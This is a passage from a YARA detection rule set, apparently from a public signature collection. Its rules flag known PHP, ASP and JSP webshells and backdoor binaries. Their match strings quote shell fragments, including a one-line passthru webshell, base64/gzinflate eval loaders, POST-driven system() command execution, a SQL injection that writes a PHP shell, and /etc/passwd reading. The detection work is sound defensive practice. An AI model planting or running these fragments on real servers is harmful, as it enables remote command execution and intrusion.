+      description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:58:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U" 
+   condition: 
+      all of them
+}
+
+rule WebShell_Uploader_RID2DC2 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file Uploader.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:45:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_php_webshells_README_RID3203 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file README.md"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 13:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+      $s1 = "php-webshells" fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_accept_language_RID3099 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file accept_language.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_mysql_tool_RID2ED9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file mysql_tool.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+      $s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_php_webshells_lolipop_RID3354 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file lolipop.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:43:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "$commander = $_POST['commander']; " fullword
+      $s9 = "$sourcego = $_POST['sourcego']; " fullword
+      $s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop_DevPack_fso_RID311E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file fso.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 13:08:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<!-- PageFSO Below -->" 
+      $s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FeliksPack3___PHP_Shells_ssh_RID3532 : DEMO T1021 T1100 WEBSHELL {
+   meta:
+      description = "Webshells PHP Webshell - file ssh.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 16:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, T1021, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "eval(gzinflate(str_rot13(base64_decode('" 
+   condition: 
+      all of them
+}
+
+rule MAL_Debug_BDoor_RID2C66 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file BDoor.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 09:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\BDoor\\" 
+      $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" 
+   condition: 
+      all of them
+}
+
+rule ZXshell2_0_rar_Folder_ZXshell_RID3224 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file ZXshell.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 13:52:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WPreviewPagesn" 
+      $s1 = "DA!OLUTELY N" 
+   condition: 
+      all of them
+}
+
+rule thelast_orice2_RID2CA9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file orice2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 09:58:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = " $aa = $_GET['aa'];" 
+      $s1 = "echo $aa;" 
+   condition: 
+      all of them
+}
+
+rule FSO_s_sincap_RID2BA8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file sincap.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 09:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">" 
+      $s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PhpShell_1_RID2E56 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file PhpShell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:10:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>." 
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop_DevPack_config_RID324C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file config.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 13:59:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "const adminPassword=\"" 
+      $s2 = "const userPassword=\"" 
+      $s3 = "const mVersion=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_zehir4_RID2F15 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file zehir4.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = " byMesaj " 
+   condition: 
+      all of them
+}
+
+rule Webshell_iMHaPFtp_RID2D7F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file iMHaPFtp.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:34:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Unpack_TBack_RID2F2C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file TBack.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:45:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "\\final\\new\\lcc\\public.dll" 
+   condition: 
+      all of them
+}
+
+rule Webshell_DarkSpy105_RID2DFA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file DarkSpy105.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:54:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_reader_RID2F32 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file reader.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "mailto:mailbomb@hotmail." 
+   condition: 
+      all of them
+}
+
+rule Webshell_KA_uShell_RID2DFE : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file KA_uShell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass" 
+      $s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_Backdoor_v1_RID3018 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:25:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th" 
+      $s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy" 
+   condition: 
+      all of them
+}
+
+rule HYTop_DevPack_server_RID2ED8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file server.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<!-- PageServer Below -->" 
+   condition: 
+      all of them
+}
+
+rule saphpshell_RID2B45 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file saphpshell_RID2B45.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 08:59:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>" 
+   condition: 
+      all of them
+}
+
+rule HYTop2006_rar_Folder_2006Z_RID2F8D : DEMO T1050 T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2006Z.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1050, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth" 
+      $s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" 
+   condition: 
+      all of them
+}
+
+rule Webshell_admin_ad_RID2DD3 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file admin-ad.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz" 
+      $s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_casus15_RID2F44 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file casus15.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))" 
+   condition: 
+      all of them
+}
+
+rule WebShell_toolaspshell_RID2FA0 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file toolaspshell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:05:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef" 
+      $s1 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+      $s2 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_b374k_mini_shell_php_php_RID33C2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 15:01:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@error_reporting(0);" fullword
+      $s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+      $s3 = "@set_time_limit(0); " fullword
+   condition: 
+      all of them
+}
+
+rule WebShell_Sincap_1_0_RID2E03 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+      $s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+      $s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+      $s12 = "while (($ekinci=readdir ($sedat))){" fullword
+      $s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_b374k_php_RID2D98 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file b374k.php.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 10:38:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+      $s6 = "// password (default is: b374k)" 
+      $s8 = "//******************************************************************************" 
+      $s9 = "// b374k 2.2" fullword
+      $s10 = "eval(\"?>\".gzinflate(base64_decode(" 
+   condition: 
+      3 of them
+}
+
+rule WebShell_h4ntu_shell__powered_by_tsoi__RID365B : DEMO SCRIPT T1033 T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 16:52:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1033, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+      $s13 = "$cmd = $_POST['cmd'];" fullword
+      $s16 = "$uname = posix_uname( );" fullword
+      $s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+      $s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>" 
+      $s20 = "ob_end_clean();" fullword
+   condition: 
+      3 of them
+}
+
+rule WebShell_php_webshells_MyShell_RID3313 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file MyShell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:32:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<title>MyShell error - Access Denied</title>" fullword
+      $s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+      $s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+      $s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o" 
+      $s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+      $s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+      $s19 = "#every command you excecute." fullword
+      $s20 = "<form name=\"shell\" method=\"post\">" fullword
+   condition: 
+      3 of them
+}
+
+rule WebShell_php_webshells_pHpINJ_RID325E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file pHpINJ.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:02:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+      $s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+      $s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN" 
+      $s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+      $s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+      $s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+      $s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+   condition: 
+      1 of them
+}
+
+rule WebShell_ru24_post_sh_RID2F32 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://www.ru24-team.net" fullword
+      $s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" 
+      $s6 = "Ru24PostWebShell" 
+      $s7 = "Writed by DreAmeRz" fullword
+      $s9 = "$function=passthru; // system, exec, cmd" fullword
+   condition: 
+      1 of them
+}
+
+rule WebShell_c99_locus7s_RID2E8A : DEMO T1087 T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file c99_locus7s.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:18:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+      $s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y" 
+      $s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq" 
+      $s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+      $s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_JspWebshell_1_2_RID300A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:22:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+      $s1 = "String password=request.getParameter(\"password\");" fullword
+      $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java." 
+      $s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+      $s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+      $s12 = "password = (String)session.getAttribute(\"password\");" fullword
+   condition: 
+      3 of them
+}
+
+rule WebShell_cgitelnet_RID2E45 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file cgitelnet.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 11:07:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+      $s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+      $s18 = "# in a command line on Windows NT." fullword
+      $s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version_RID3A6D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 19:46:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+      $s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'." 
+      $s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+   condition: 
+      1 of them
+}
+
+rule WebShell_STNC_WebShell_v0_8_RID30CF : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:55:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+      $s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()" 
+      $s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw" 
+   condition: 
+      2 of them
+}
+
+rule WebShell_Web_shell__c_ShAnKaR_RID3203 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 13:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+      $s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump" 
+      $s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+      $s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_Gamma_Web_Shell_RID303D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+      $s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+      $s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+      $s20 = "my $command = $self->query('command');" fullword
+   condition: 
+      2 of them
+}
+
+rule WebShell_php_webshells_aspydrv_RID335E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file aspydrv.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 14:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files" 
+      $s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+      $s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+      $s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+      $s20 = "' ---Copy Too Folder routine Start" fullword
+   condition: 
+      3 of them
+}
+
+rule WebShell_JspWebshell_1_2_2_RID309B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-06 12:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
